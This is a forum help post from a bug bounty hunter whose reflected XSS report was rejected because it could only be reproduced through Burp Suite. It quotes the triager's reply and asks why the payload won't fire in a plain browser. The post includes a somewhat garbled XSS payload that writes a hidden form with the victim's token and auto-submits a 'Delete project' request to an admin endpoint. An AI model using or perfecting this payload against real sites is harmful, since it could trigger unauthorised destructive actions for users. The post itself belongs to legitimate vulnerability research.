
Without Burp Suite, XSS does not execute

Shuvo Ahmed Nov 25, 2019 09:05PM UTC

Hello everyone,
I am facing a problem.
I found a reflected XSS and reported it, but they don't accept it. They said:
----------------------------------------------------------------------------------------
Thank you for the report. In your reproduction steps you use burp. Could you add reproduction steps to exploit this vulnerability without the use of burp?
We ask this because having to trick your victim into installing a proxy like burp and getting them to capture and edit their own request is not very likely to happen.
If you are not able to exploit this XSS without the use of a proxy we have to reject this report.
----------------------------------------------------------------------------------------------

Then I tried to execute the XSS directly in the browser, but it's not working.

payload :
">document.writeln(‘<form width=”0" height=”0" method=”POST” action=”’+x+’adminAdvanced.do”>’); document.writeln(‘<input type=”hidden” name=”token” value=”’ + token + ‘“ />’); document.writeln(%3Cscript%3Ealert%281%29%3C%2fscript%3E‘<input type=”hidden” name=”deletebtn” value=”Delete+project” />’); document.writeln(‘</form>’); document.forms[0].submit();

When I use Burp Suite, the XSS executes and gives alert (1),
but when I try to execute it directly in the browser, it does not execute. But why?

Is there any solution?

Thank you

